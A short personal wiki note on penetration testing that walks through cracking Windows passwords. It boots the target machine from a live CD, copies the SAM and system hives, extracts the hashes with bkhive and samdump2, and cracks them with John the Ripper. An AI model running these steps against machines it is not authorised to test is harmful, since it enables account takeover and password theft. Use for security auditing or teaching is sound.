Bkhive, samdump2, john
From Notes_Wiki
Home > CentOS > CentOS 6.x > Penetration testing tools > John > Bkhive, samdump2, john
We can use bkhive, samdump2 and john to crack windows passwords. Weak passwords get cracked within minutes using this technique.
- Copy 'C:\Windows\system32\config\sam' and 'C:\Windows\system32\config\security'. These files cannot be copied even as administrator when windows is running. Hence you have to boot target PC using Live CD to get these files.
- Unzip Bkhive.zip in some folder.
- usage: bkhive systemhive keyfile
- so type command: 'wine Bkhive.exe system keys.txt'
- Note: use Bkreg in place of Bkhive for pre Sp4 systems.
- Unzip Samdump2.zip in some folder
- Type command 'wine Samdump2.exe SAM keys.txt > hashes.txt'
- Now use 'john hashes.txt' to crack the passwords.
- To see the cracked passwords later, just type 'john -show hashes.txt' in same folder. There is a john.pot file in the folder making this possible. John also stores some information in ~/.john.
Note: We can start john using 'john --session=imp' and press 'Ctrl+C' to stop john in between. To resume we can use 'john --restore=imp'.
Home > CentOS > CentOS 6.x > Penetration testing tools > John > Bkhive, samdump2, john